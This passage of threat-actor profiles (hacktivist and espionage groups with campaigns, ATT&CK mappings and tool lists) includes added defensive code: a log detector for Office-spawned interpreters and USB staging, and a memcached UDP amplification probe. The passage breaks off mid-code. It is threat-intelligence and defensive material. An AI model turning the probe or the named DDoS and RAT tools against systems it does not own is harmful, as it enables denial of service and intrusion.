
2018 - Present - #OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. Lorian Synaro has claimed to have taken many Israeli websites offline, although he has also taken responsibility for defacements and shared some data leaks.

2018 - #OpIcarus
#OpIcarus is a hacktivist cyber operation launched by Anonymous in 2016 against websites and services associated with the global financial system. Lorian Synaro has mainly taken responsibility for taking offline various websites of financial institutions and banks.

2018 - Present - #OpNicaragua
A hacktivist campaign against the government of Nicaragua in protest against its alleged repression of protest movements in the country. Lorian Synaro is highly active in this campaign, publishing claims of taking offline many Nicaraguan governmental targets, sharing data leaks and claiming to have defaced various websites.

2018 - #OpCatalunya / #OpCatalonia
A hacktivist cyber campaign first launched in 2017 against Spanish targets in support of Catalonia's independence. Lorian Synaro mainly published claims of taking offline various Spanish websites.

2018 - #OpVenezuela
A hacktivist campaign against the Venezuelan government. Lorian Synaro published several claims that he had taken offline multiple Venezuelan governmental websites as part of this campaign.

2018 - #OpKhashoggi, #OpSaudi, #OpSaudiArabia
A cyber campaign against Saudi Arabia that was launched by Anonymous in October 2018 in response to the assassination of Saudi journalist Jamal Khashoggi in the Saudi consulate in Istanbul. Lorian Synaro has published various claims that he had taken offline Saudi websites, and he also shared some data leaks as part of the campaign.

2018 - #OpYemen
A hacktivist cyber operation against Saudi Arabia in protest against the Saudi-led intervention in Yemen that allegedly resulted in the starvation of Yemen's population. Lorian Synaro has claimed he had taken offline the website of the House of Saud, the royal family of Saudi Arabia.

2018 - #OpGabon
A hacktivist campaign by Anonymous against Gabonese targets in protest against the alleged ritual killings of Gabonese citizens and the alleged dictatorship in the country. Lorian Synaro has published various claims that he had taken offline Gabonese websites.

2018 - #OpCongo
A hacktivist cyber operation against the oppression and dictatorship in Congo, according to Lorian Synaro. Lorian Synaro has published various claims that he had taken offline Congolese governmental websites.

2018 - #OpFrance
A hacktivist campaign first launched by Anonymous in solidarity with the Yellow Vests Movement (Mouvement des gilets jaunes) in France. Lorian Synaro has claimed he had taken offline several French websites as part of this campaign.

2018 - Present - #OpSudan
A cyber campaign that supports the protests against the Sudanese government. Lorian Synaro was highly active in promoting this campaign and has extensively participated in it. He has taken part in taking websites offline, defacing them and leaking information as part of the campaign, and also shared the activities of his fellow hacktivists.

2019 - #OpZimbabwe
A hacktivist campaign against the government of Zimbabwe. Lorian Synaro has taken responsibility for taking offline a few governmental websites and websites of financial organizations in Zimbabwe.

2019 - #OpHonduras
A hacktivist campaign against the allegedly oppressive and tyrannical regime in the country. Lorian Synaro has claimed he had taken offline two governmental websites and defaced one.

Timeline: 2018-present #OpIsrael; 2018-present #OpNicaragua; 2018 #OpIcarus; 2018 #OpCatalunya / #OpCatalonia; 2018 #OpVenezuela; 2018 #OpKhashoggi, #OpSaudi, #OpSaudiArabia; 2018 #OpYemen; 2018 #OpGabon; 2018 #OpCongo; 2018 #OpFrance; 2018-present #OpSudan; 2019 #OpZimbabwe; 2019 #OpHonduras.

MODUS OPERANDI (ATT&CK FRAMEWORK)

Collection
T1005 - Data from Local System

Impact
T1491 - Defacement
T1498 - Network Denial of Service

Alias _ ATK 97, El Machete, Machete, TAG-NS1
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Communication, Defense, Energy, Government Agencies, Military
Motivations & Objectives _ Cyber espionage
Score _ 25
Language _ Spanish

DESCRIPTION
El Machete is a cyber espionage group that has been active since 2010. They usually target the government and military sectors in Latin America, but also in several European countries, the USA and Korea. The source code of the group's malware, usually distributed in sophisticated spear-phishing attacks, indicates they are Spanish speakers. It is unclear if they are a nation-sponsored group of cybercriminals that sells stolen sensitive information.

CAMPAIGNS

2010-2014 - Machete targets intelligence services and government institutions in Latin America and Spain
During this campaign, the group distributed the Machete malware with malicious PowerPoint presentations and social engineering techniques that also included a fake blog. They attacked Venezuela, Ecuador, Colombia, Peru, Cuba, Spain and Russia, where embassies of Latin American countries were detected.

2017 - Machete cyber espionage campaigns
Machete launched cyber espionage campaigns against the government, utilities and military sectors in Latin American countries, but also in Canada, Korea, the USA and European countries such as Germany, the United Kingdom and Russia.

March - May 2019 - Targeting military and official institutions in Venezuela and Ecuador
During 2019, El Machete continued to target high-profile targets in Latin America, specifically in Venezuela, where sensitive information related to the country's military and official institutions was stolen, and also in Ecuador. During this campaign they used a new version of the Machete malware that was first detected in April 2018. The malware was spread by spear-phishing attacks, using real documents that had been stolen in previous attacks. In addition, they used Radiogramas, documents used for communication in the military forces, along with military jargon and etiquette in order to create sophisticated phishing emails.

Timeline: 2010-2014 Machete targets intelligence services and government institutions in Latin America and Spain; 2017 Machete cyber espionage campaigns; Mar-May-2019 Targeting military and official institutions in Venezuela and Ecuador.

TOOLS, MALWARES AND VULNERABILITIES


Malwares Legitimate software Exploited vulnerabilities
 Machete  Microsoft Office  None
Self developed malware coded in Python that has PowerPoint
downloader and backdoor components. The malware
is capable of the following cyber-espionage operations:
- Logging keystrokes
- Capturing audio from the computer’s microphone
- Capturing screenshots
- Capturing geolocation data
- Taking photos from the computer’s web camera
- Copying files to a remote server
- Copying files to a special USB device if inserted
- Hijacking the clipboard and capturing information
from the target machine

176 The Cyberthreat Handbook • Thales - Verint


Targeted Countries _
Argentina, Belgium, Bolivia, Brazil, Canada, China, Colombia, Cuba, Ecuador, France, Germany, Guatemala, Korea, Nicaragua, Peru, Spain, Ukraine, United States, Venezuela

Assumed origin of the attacker: Latin America

MODUS OPERANDI (ATT&CK FRAMEWORK)
Initial Access
- T1189 - Drive-by Compromise
- T1192 - Spearphishing Link
- T1193 - Spearphishing Attachment
Execution
- T1053 - Scheduled Task
Persistence
- T1053 - Scheduled Task
Privilege Escalation
- T1053 - Scheduled Task
Defense Evasion
- T1027 - Obfuscated Files or Information
- T1036 - Masquerading
- T1140 - Deobfuscate/Decode Files or Information
Credential Access
- T1056 - Input Capture
Discovery
- T1120 - Peripheral Device Discovery
- T1217 - Browser Bookmark Discovery
Lateral Movement
- T1105 - Remote File Copy
Collection
- T1005 - Data from Local System
- T1025 - Data from Removable Media
- T1056 - Input Capture
- T1113 - Screen Capture
- T1115 - Clipboard Data
- T1119 - Automated Collection
- T1123 - Audio Capture
Command and Control
- T1043 - Commonly Used Port
- T1071 - Standard Application Layer Protocol
- T1105 - Remote File Copy
Exfiltration
- T1002 - Data Compressed
- T1022 - Data Encrypted
- T1048 - Exfiltration Over Alternative Protocol
- T1052 - Exfiltration Over Physical Medium
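The Machete tool description and ATT&CK mapping above describe a chain a defender can look for: an Office document (PowerPoint) that drops a Python-based implant, persistence through a scheduled task, and staging of stolen files on removable media. The detector below is an added example, not code from the handbook or from the actor. It runs over a constructed log in a simplified key=value layout (an assumption, not the real Sysmon or Windows Security schema; the field names, process paths and the choice of C: as the system drive are all assumptions) and chains the three rules so that the removable-media rule only fires for a process already flagged by the first two.

```python
"""Toy detector for the Machete tradecraft described above: an Office document
that drops a Python-based implant, persistence through a scheduled task, and
staging of stolen files on removable media.  Added example, not code from the
handbook or the actor.  The log layout (key=value fields, quoted when they
contain spaces) is a constructed simplification of Sysmon/Security events,
not their real schema, and the field names are assumptions."""
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath

OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe"}
INTERPRETERS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
SYSTEM_DRIVE = "c:"  # assumption: removable media shows up as any other drive letter

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse(line):
    """key=value fields into a dict; quotes around values are stripped."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def basename(path):
    return PureWindowsPath(path).name.lower()

def first_exe(command):
    """Executable part of a scheduled-task action such as 'x.exe script.py'."""
    m = re.match(r"(.*?\.exe)", command, re.IGNORECASE)
    return m.group(1) if m else command

def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)

@dataclass
class Detector:
    """Keeps the images flagged by rules 1 and 2 so rule 3 can chain on them."""
    flagged_images: set = field(default_factory=set)

    def evaluate(self, line):
        ev = parse(line)
        kind = ev.get("event")
        if kind == "ProcessCreate":
            # Rule 1: an Office application launching a script interpreter.
            if basename(ev.get("parent", "")) in OFFICE_APPS and basename(ev.get("image", "")) in INTERPRETERS:
                self.flagged_images.add(ev["image"].lower())
                return "office_spawns_interpreter"
        elif kind == "ScheduledTaskCreated":
            # Rule 2: a task whose action is an interpreter or .py file under a user-writable path.
            exe = first_exe(ev.get("action", ""))
            if in_user_writable(exe) and (basename(exe) in INTERPRETERS or exe.lower().endswith(".py")):
                self.flagged_images.add(exe.lower())
                return "user_path_scheduled_task"
        elif kind == "FileCreate":
            # Rule 3: a flagged process writing outside the system drive (USB staging).
            drive = PureWindowsPath(ev.get("target", "")).drive.lower()
            if ev.get("image", "").lower() in self.flagged_images and drive and drive != SYSTEM_DRIVE:
                return "flagged_process_writes_removable_media"
        return None

def scan(lines):
    """Return [(line number, rule name)] for every line that trips a rule."""
    det, hits = Detector(), []
    for n, line in enumerate(lines, 1):
        rule = det.evaluate(line)
        if rule:
            hits.append((n, rule))
    return hits

# Constructed sample: lines 2-4 are the Machete-style chain, the rest is benign noise.
SAMPLE_LOG = r'''
event=ProcessCreate host=ws01 user=ACME\jdoe parent="C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" image="C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" cmdline="POWERPNT.EXE /s Q3_results.pptx"
event=ProcessCreate host=ws01 user=ACME\jdoe parent="C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" image=C:\Users\jdoe\AppData\Local\Temp\pythonw.exe cmdline="pythonw.exe C:\Users\jdoe\AppData\Local\Temp\upd.py"
event=ScheduledTaskCreated host=ws01 user=ACME\jdoe task=\Microsoft\Windows\Update\Upd action="C:\Users\jdoe\AppData\Local\Temp\pythonw.exe C:\Users\jdoe\AppData\Local\Temp\upd.py"
event=FileCreate host=ws01 image=C:\Users\jdoe\AppData\Local\Temp\pythonw.exe target=E:\.cache\docs.zip
event=FileCreate host=ws01 image=C:\Windows\explorer.exe target=E:\report.docx
event=ProcessCreate host=ws02 user=ACME\dev parent=C:\Windows\explorer.exe image=C:\Python37\python.exe cmdline="python.exe build.py"
'''.strip().splitlines()

def demo():
    return scan(SAMPLE_LOG)

if __name__ == "__main__":
    for n, rule in demo():
        print(f"line {n}: {rule}")
```

Rule 3 deliberately depends on rules 1 and 2: a user copying a report to a USB stick with Explorer (line 5) is not an alert, while the same write by an interpreter that Office spawned is. A network drive letter would also satisfy the drive check, so in a real deployment the drive-type field of the volume should be consulted instead of the letter.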

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ATK 143, LulzSec Italia, LulzSecITA, Lulz Security Italy, TAG-HA1
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Administration, Communication, Cyber-security, Defense, Education, Government Agencies, Healthcare, High-Tech, Manufacturing, Media, Military, Pharmaceutical, Political Organizations, Research, Labor Unions, Transportation
Motivations & objectives: Ideology, Unpredictable
Score: 25
Language: Italian

DESCRIPTION
LulzSec Italia is an Italian hacktivist collective that has dominated, alongside other groups (e.g. Anonymous Italia, AntiSec Italia and AnonPlus), the Italian hacktivist landscape during the past decade. We tracked the activity of the group back to 2011, when the first attacks against multiple Italian universities were registered. In line with the global LulzSec movement, LulzSec Italia also embraces an anarchist ideology and conducts attacks for "fun". Nonetheless, we always identify a clear political/social motive behind the attacks, denoting a digression from the mainstream conduct of the global LulzSec movement. In this regard, the group also engages in real-life demonstrations (e.g. OpPaperstormITA). This observation is strengthened by the recent alliance established by the group in 2018 with Anonymous Italia, a significantly more ideology-driven group. With regard to the types of attacks performed by LulzSec Italia, the group was observed conducting mainly data leaks and defacements, and rarely DDoS attacks.

CAMPAIGNS
2011 - ongoing - #OpGreenRights Campaign
A cyber/real-world campaign protesting alleged environmental crimes perpetrated by multinational companies. In this context, the hackers launched several operations against Italian organizations perceived to be in violation of environmental rights.

2011 - ongoing - #OperationItaly Campaign
A cyber campaign against the Italian political system and institutions. In February 2016, the hacktivists DDoS'ed the Italian Parliament website (parlamento.it). In February 2017, LulzSec defaced a website related to the Italian Ministry of Justice (camerepenali.it). In May 2017, the hackers leaked sensitive data stored on the Italian Foreign Ministry servers.

February 2018 - Il Messaggero Attack
The hackers leaked sensitive data from the servers of the Italian newspaper Il Messaggero, publishing it online.

March 2018 - Italian Ministry of Education Attacks
The hackers stole the personal details of 26,600 members of the Italian Ministry of Education, University and Research (MIUR) personnel.

July 2018 - #OpSafePharma Campaign
A cyber campaign against the pharmaceutical sector in general, and its treatment of patients affected by ADHD in particular. For instance, in July 2018 LulzSec hacked the servers of hospitals and pharmaceutical organizations, leaking sensitive data online.

September 2018 - INAS Attack
In September 2018, the hackers leaked the personal details of 37,500 individuals from the servers of the Italian Confederation of Workers' Trade Unions.

November 2018 - #FifthOfNovember/OpBlackWeek Campaign
A cyber/real-world campaign commemorating Guy Fawkes Night. In this context, LulzSec launched numerous attacks against the education, labor, healthcare, administration and political sectors.

2018 - #OpPaperstormITA Campaign
A real-world campaign aimed at distributing anti-government messages through flyers and graffiti around Italy. The hackers promoted the initiative multiple times on their social media profiles.

May 2019 - Rome Lawyers
In May 2019 the hackers leaked sensitive data of the Rome lawyers' association, including the personal details of the city's mayor, Virginia Raggi.



Targeted Countries _
Italy

Assumed origin of the attacker: Italy

MODUS OPERANDI (ATT&CK FRAMEWORK)
Initial Access
- T1190 - Exploit Public-Facing Application
Impact
- T1491 - Defacement
- T1498 - Network Denial of Service

TOOLS, MALWARES AND VULNERABILITIES
Malwares
Custom tools
- FuckingBotnet
- KLTools
Tools used by multiple adversaries
- None Identified
Publicly available tools
- SQLMap (allegedly)
- SQLninja (allegedly)
Legitimate software
- None Identified
Exploited vulnerabilities
- CVE-2018-12711
- CVE-2018-12712

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ATK 138, HABIL MOONZ, INDONESIALINUXER, MOONZLINUXER, MRMOONZ, TAG-HA13
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Communication, Cyber-security, Government Agencies, High-Tech
Motivations & objectives: Ideology
Score: 24
Language: English and Indonesian

DESCRIPTION
MrMoonz (Habil Moonz) is an Anonymous-affiliated Indonesian hacktivist who describes himself as an exploiter, network security specialist and pentester who specializes in Linux. He was a member of the hacktivist group Rabbit Security Team, which mainly defaced websites. According to his Facebook and Instagram accounts, he is a student at the public university Institut Teknologi Bandung, Kampus Jatinangor. During May-June 2019, he targeted the Indonesian government during the #OpIndonesia cyber campaign. Moreover, unlike other hacktivists, who usually focus on the government and financial sectors, he also carried out a cyber-attack against two ICS systems of Indonesian companies via Metasploit commands and promised to cause a blackout.

CAMPAIGNS
2013 - present - #OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. MrMoonz published tweets supporting the campaign.

2019 - #OpIndonesia
A cyber campaign launched to protest against the violent clashes that followed the Indonesian elections (April 17, 2019) and the announcement of the Indonesian General Elections Commission on May 21, 2019. MrMoonz published a target list of Indonesian government websites and DDoS tools. He also took responsibility for shutting down one of the Indonesian government websites mentioned in this list. Moreover, he threatened to publish 58GB of sensitive data and provided a screenshot of a folder containing images of identification documents that apparently belong to Indonesian citizens. In addition, he used Metasploit commands against two ICS systems of Indonesian companies.

TOOLS, MALWARES AND VULNERABILITIES
Malwares
Custom tools
- None Identified
Tools used by multiple adversaries
- None Identified
Publicly available tools
- Metasploit: an open-source framework used for penetration testing.
- WarChild: a denial-of-service testing suite made for analyzing the strength of a website against different kinds of denial-of-service attacks. The tool is available on GitHub.
- Memcrashed-DDoS-Exploit: a DDoS attack tool that sends forged UDP packets to vulnerable Memcached servers obtained using the Shodan API. The tool is available on GitHub.
- Saphyra (iDDoS Private Tool): this tool targets layer 7 (the application layer) to carry out an HTTP flood DDoS attack. The tool was developed by the hacktivist HaX StroKE and is available on Pastebin. According to news reports, it was used to take down the NASA website in 2016.
- TheFatRat: a backdoor creator for remote access. The tool is available on GitHub.
- DarkComet RAT: a popular remote access trojan developed by a French programmer. The tool was available on its official website until August 2018.
- rc-exploiter: resource file services exploiter, a framework that scans WAN networks for targets and tries to automatically exploit open services on each target. The tool is available on GitHub.
Legitimate software
- ngrok: the tool exposes local servers behind NATs and firewalls to the public internet over secure tunnels. MrMoonz uses this tool to expose the DarkComet RAT controller to the web.
Exploited vulnerabilities
- None Identified



Targeted Countries _
Indonesia, Israel

Assumed origin of the attacker: Indonesia

MODUS OPERANDI (ATT&CK FRAMEWORK)
Execution
- T1203 - Exploitation for Client Execution
Credential Access
- T1110 - Brute Force
Impact
- T1491 - Defacement
- T1498 - Network Denial of Service
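The Memcrashed tool listed in this profile works because a memcached instance reachable over UDP answers a tiny, source-spoofed request with a large reply. The operator-side check is therefore whether your own server answers over UDP at all and by how much it amplifies. The code below is an added example, not code from the handbook or from any of the tools named above: it builds the memcached UDP frame (an 8-byte header of request id, sequence number, datagram count and a reserved word, followed by the ASCII command) and measures bytes received per byte sent. The reply used offline is constructed, with invented statistics, and the only network-touching function sends a single probe from your real address to a host you administer.

```python
"""Operator-side check for the memcached UDP amplification vector that the
Memcrashed tool above relies on.  Added example, not code from the handbook
or the tool.  It sends a single, honestly-sourced 'stats' probe and measures
how many bytes come back per byte sent; it does not spoof addresses."""
import socket
import struct

MEMCACHED_UDP_PORT = 11211
# memcached UDP frame header: request id, sequence number, datagram count, reserved
HEADER = struct.Struct("!HHHH")

def build_request(command=b"stats", request_id=0x1234):
    """One memcached UDP datagram: 8-byte frame header followed by the ASCII command."""
    return HEADER.pack(request_id, 0, 1, 0) + command + b"\r\n"

def parse_response(datagram):
    """Split a reply into (request_id, seq_no, total_datagrams, payload)."""
    if len(datagram) < HEADER.size:
        raise ValueError("datagram shorter than the memcached UDP header")
    request_id, seq_no, total, _reserved = HEADER.unpack_from(datagram)
    return request_id, seq_no, total, datagram[HEADER.size:]

def amplification(request, datagrams):
    """Bytes received per byte sent, counting only replies to our request id."""
    want = HEADER.unpack_from(request)[0]
    received = sum(len(d) for d in datagrams if parse_response(d)[0] == want)
    return received / len(request)

def probe(host, port=MEMCACHED_UDP_PORT, timeout=2.0):
    """Send one probe to a server you administer and collect every reply.
    Returns (amplification_factor, datagram_count).  A factor of 0.0 means the
    server did not answer over UDP, which is the expected result once UDP is off."""
    request = build_request()
    replies = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, port))
        try:
            while True:
                data, _addr = sock.recvfrom(65535)
                replies.append(data)
        except socket.timeout:
            pass
    return amplification(request, replies), len(replies)

# Constructed reply used for the offline demonstration: a short 'stats'
# listing with invented values (a real listing is much longer).
FAKE_STATS_BODY = (
    b"STAT pid 1234\r\n"
    b"STAT uptime 86400\r\n"
    b"STAT version 1.5.4\r\n"
    b"STAT curr_connections 10\r\n"
    b"STAT total_items 50000\r\n"
    b"STAT bytes 10485760\r\n"
    b"END\r\n"
)

def fake_stats_reply(request_id=0x1234):
    return HEADER.pack(request_id, 0, 1, 0) + FAKE_STATS_BODY

def demo():
    """Amplification factor an exposed server would show for the constructed reply."""
    return amplification(build_request(), [fake_stats_reply()])

if __name__ == "__main__":
    print(f"probe is {len(build_request())} bytes; demo amplification x{demo():.1f}")
```

Any factor above 1.0 over UDP means the amplification vector exists on that host. The fix is configuration, not filtering of the probe: start memcached with -U 0 to disable the UDP listener (memcached 1.5.6 and later ship with UDP disabled by default) and bind it to an internal interface with -l, then re-run probe() and expect (0.0, 0).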

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ANONYMOUS ARGENTINA, ATK 122, TAG-HA5
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Energy, Government Agencies, International Organizations, Political Organizations
Motivations & objectives: Ideology
Score: 23
Language: Spanish

DESCRIPTION
Anonymous Argentina is apparently a low-skilled hacktivist group associated with the Anonymous collective, operating in Argentina since at least 2012. The group is not very active, and mainly engages in minor defacements and data leaks of government-related institutions in South America (mainly Argentina), mostly during South America-related campaigns carried out by Anonymous groups.

CAMPAIGNS
2015 - Present - #OpArgentina
OpArgentina is an Anonymous campaign against the Argentinean administration. In 2015, the group claimed to have successfully executed a DoS attack and taken down the official site of the then-president of Argentina, Cristina Fernández de Kirchner, among other politicians' websites. In 2019, the group leaked a small number of credentials from the Argentinean customs broker center (CDA) as part of the campaign and published the information on the text-sharing platform Pastebin. The group claimed to have the database of the CDA and the database of the Argentinean Mission Police site. In addition, the group also claimed to have taken down several other Argentinean government-related websites.

2019 - #OpEcuador - FreeAssange
As part of the OpEcuador / FreeAssange campaign, the group leaked a couple of hundred records containing names, emails and passwords from the Ecuadorian power distribution company Empresa Eléctrica Regional del Sur. The information was published on Pastebin.

2019 - #OpNeoNazi
As part of the OpNeoNazi campaign, targeting neo-Nazi groups, the group claimed responsibility for taking down a site of an Argentinean neo-Nazi group.

2019 - #OpStopWarCorea
As part of the OpStopWarCorea campaign carried out by various Anonymous groups, the group claimed responsibility for taking down the Mexican government-related Sonoran Institute of Culture.

TOOLS, MALWARES AND VULNERABILITIES
Malwares
Custom tools
- None Identified
Tools used by multiple adversaries
- None Identified
Publicly available tools
- None Identified
Legitimate software
- None Identified
Exploited vulnerabilities
- None Identified



Targeted Countries _
Argentina, Ecuador, Mexico

Assumed origin of the attacker: Argentina

MODUS OPERANDI (ATT&CK FRAMEWORK)
Initial Access
- T1003 - Credential Dumping
Credential Access
- T1003 - Credential Dumping
Impact
- T1491 - Defacement
- T1499 - Endpoint Denial of Service

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ATK 130, FALLAGA TEAM, TAG-CT4
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Aerospace, Aviation, Communication, Construction, Education, Financial Services, Government Agencies, Healthcare, Hospitality, Media, Political Organizations
Motivations & objectives: Ideology, Revenge
Score: 23
Language: Arabic

DESCRIPTION
Fallaga Team is a Tunisian Islamist hacker group. Its stated goal is to spread the word of Islam and help all Muslims. Fallaga Team claims it is not an extension of the Islamic State (ISIS), although its Facebook page states that it shares similar religious and political ideals. The group is named after the anti-colonial movement that fought for the independence of Tunisia; there were also Fallaga fighters in Algeria. The character in the group's logo resembles the original Fallaga fighters. According to Fallaga Team's Facebook page, the group has been active since at least July 2010. Apparently the group is no longer active and has ceased to operate. However, some threat actors who identify with the group are still performing cyber attacks on its behalf and use its name and logo. The group mainly performed defacements, data leaks and DDoS attacks. The group was known for its attacks against Israeli websites, especially within #OpIsrael attacks. However, it attacked multiple other websites around the globe.

TOOLS, MALWARES AND VULNERABILITIES
Malwares
Custom tools
- LOIC Fallaga
Tools used by multiple adversaries
- None Identified
Publicly available tools
- None Identified
Legitimate software
- None Identified
Exploited vulnerabilities
- None Identified



Targeted Countries _
Australia, Belgium, France, Hungary, Ireland, Israel, Italy, Pakistan, Russia, Thailand, Tunisia, United Kingdom, United States

Assumed origin of the attacker: Tunisia

CAMPAIGNS
May 2013 - OpUSA
Cyber attacks that were planned for May 7, 2013 in response to alleged US crimes in Iraq, Afghanistan and Pakistan. Fallaga Team was among the hackers that confirmed their participation.

2014 - Defacement of Russian Websites
Fallaga Team and three additional hacker groups, Cyber Caliphate, Team System Dz and Global Islamic Caliphate, breached and defaced 600 Russian websites.

January 2015 - Tunisian Websites Attack
The group claimed responsibility for hacking several Tunisian governmental websites, including those of the Ministry of Culture and the Ministry of Transport. In addition, the official website of the Tunisian Internet Agency (ATI), the former national Internet Service Provider, was hacked.

January 2015 - Op_France and Charlie Hebdo incident
A large hacking operation targeting thousands of French websites in retaliation for the cartoons published by the satirical French weekly Charlie Hebdo, following the shooting attack on the newspaper. During the campaign, in which Fallaga Team participated, 20,000 French websites were attacked, including military websites, small business websites, banks and more.

April 2015 - Belgian Website Attack
Fallaga Team attacked the website of the Walloon Government, the executive branch of Wallonia and one of the six main governments of Belgium.

April 2015-2016 - OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. During the campaigns, Fallaga Team claimed responsibility for defacing private Israeli websites and published data leaks containing information about Israelis.

August 2015 - Thai Government Websites Attack
The group targeted the official government websites of four provinces, a government hospital and a university publishing house.

November 2015 - Hungarian TV Station Attack (N1TV)
A Hungarian television channel was attacked by Fallaga Team in response to the channel's camerawoman blocking refugees who were trying to flee from the police. The group took down the channel's site and servers.

December 2016 - Op_zouari
A cyber attack in response to the assassination of the Hamas engineer Mohamed Zouari. During the campaign, the group attacked multiple private Israeli websites.

January 2017 - UK NHS Websites Attack
During January 2017, Fallaga Team defaced six National Health Service (NHS) websites in protest against the West's interference in the Middle East.

January 2017 - Australian Websites Attack
During January 2017, the website of the Treasurer of the Australian state of Victoria was hacked by Fallaga Team in response to the killing of innocent people in Syria. In addition, a number of Australian school and college websites were hacked.

MODUS OPERANDI (ATT&CK FRAMEWORK)


Credential Access
- T1003 - Credential Dumping
Impact
- T1491 - Defacement
- T1498 - Network Denial of Service

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ATK 131, RUSSIANSEC, @russiansec171, TAG-HA7
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Administration, Defense, Education, Energy, Food and Agriculture, Government Agencies, Healthcare, Media, Military, Transportation
Motivations & objectives: Ideology
Score: 23
Language: Portuguese

DESCRIPTION
RUSSIANSEC is a group of hacktivists active since at least June 2019. We tracked the group's activity and found that it is linked to operations conducted together with other well-known adversaries, such as NewSecGroup, LorianSynaro, BSSNRI and DemonSad3, during the #OpIndonesia cyber campaign in 2019.

CAMPAIGNS
2019 - #OpSudan
On April 5, 2019, the group declared that it had joined #OpSudan, a hacktivist cyber campaign against Omar Al-Bashir's regime in Sudan. In this campaign, the group targeted multiple Sudanese government-related domains and websites and claimed responsibility for DDoS attacks on and defacement of the attacked websites. Of note, the attacks that were conducted were spread over a broad variety of sectors that involve government activity.

June 2019 - #OpIndonesia
A cyber campaign launched to protest against the violent clashes that followed the Indonesian elections (April 17, 2019) and the announcement of the Indonesian General Elections Commission on May 21, 2019. RUSSIANSEC claimed responsibility for hacking and leaking data from the Indonesian Armed Forces official website.

TOOLS, MALWARES AND VULNERABILITIES
Malwares
Custom tools
- None Identified
Tools used by multiple adversaries
- None Identified
Publicly available tools
- None Identified
Legitimate software
- SQLMAP
- NMAP
Exploited vulnerabilities
- None Identified



Targeted Countries _
Indonesia, Sudan

Assumed origin of the attacker: Russia

MODUS OPERANDI (ATT&CK FRAMEWORK)
Credential Access
- T1003 - Credential Dumping
Impact
- T1491 - Defacement
- T1498 - Network Denial of Service

Alias _ Threat Actor _ Targeted Sectors _ Motivations & Objectives _
Alias: ATK 134, FXMSP, TAG-CRI7
Threat actor type (profile checklist): Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Aviation, Cyber-security, Education, Energy, Financial Services, Food and Agriculture, Government Agencies, Manufacturing, Retail, Transportation
Motivations & objectives: Personal gain
Score: 22
Language: Russian, English

DESCRIPTION
Fxmsp (ATK 134) is a hacker group operating in popular Russian- and English-speaking underground communities, active since at least 2017. The group has a long-standing reputation for selling sensitive information from high-profile global entities, mainly corporate and government networks worldwide. It is mostly known for breaching three top American anti-virus companies and offering the exfiltrated data for sale in April 2019.

CAMPAIGNS
October 2018 - Reliance Industries Limited
In October 2018, one of the group's sellers, dubbed BigPetya, offered for sale access to the internal servers of several entities, including the Indian giant Reliance Industries Limited. The seller offered "full access with admin rights, all server counts and all PCs on the network", in addition to "access to the domain controller".

October 2018 - April 2019 - Anti Virus Companies Breach
On April 24, 2019, the group claimed to have gained access to three leading anti-virus companies. The group extracted sensitive source code from antivirus software, AI and security plugins belonging to the three companies, namely Symantec, McAfee and Trend Micro. The group's sellers later offered for sale exclusive information stolen from the anti-virus companies, including network access and source code related to the companies' software development. Actors within the group claimed that the breach research had been their main project for six months.

TOOLS, MALWARES AND VULNERABILITIES
Malwares
Custom tools
- The group claimed to have developed its own credential-stealing botnet, capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords and offer them for sale as well.
Tools used by multiple adversaries
- None Identified
Publicly available tools
- None Identified
Legitimate software
The group mainly uses available legitimate remote desktop (RDP) servers and exposed Active Directory environments to gain access.
- TeamViewer
- AnyDesk
- Active Directory
Exploited vulnerabilities
- None Identified



Targeted Countries _
Colombia, Ghana, India, United States

Assumed origin of the attacker: Russia

MODUS OPERANDI (ATT&CK FRAMEWORK)
Credential Access
- T1003 - Credential Dumping
Collection
- T1039 - Data from Network Shared Drive
Command and Control
- T1219 - Remote Access Tools
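The profile says Fxmsp gets in through legitimate, reachable RDP servers and exposed Active Directory, with stolen credentials as the currency. Two checks follow from that for an organisation's own logs: successful RDP logons (logon type 10) from outside its address space, and password spraying (one source, many accounts) against RDP. The code below is an added example, not code from the handbook or the actor. The handbook does not say how the credentials were obtained, so the spraying rule is an assumption about the commonest abuse of exposed RDP; the event layout is a constructed key=value rendering of Security events 4624/4625, the internal ranges are assumptions, and the sample events, including the documentation-range source address, are constructed.

```python
"""Two checks for the access pattern described above, internet-facing RDP and
stolen credentials: successful RDP logons from outside the organisation's own
address space, and password spraying (one source, many accounts) against RDP.
Added example, not code from the handbook or the actor.  The event layout is a
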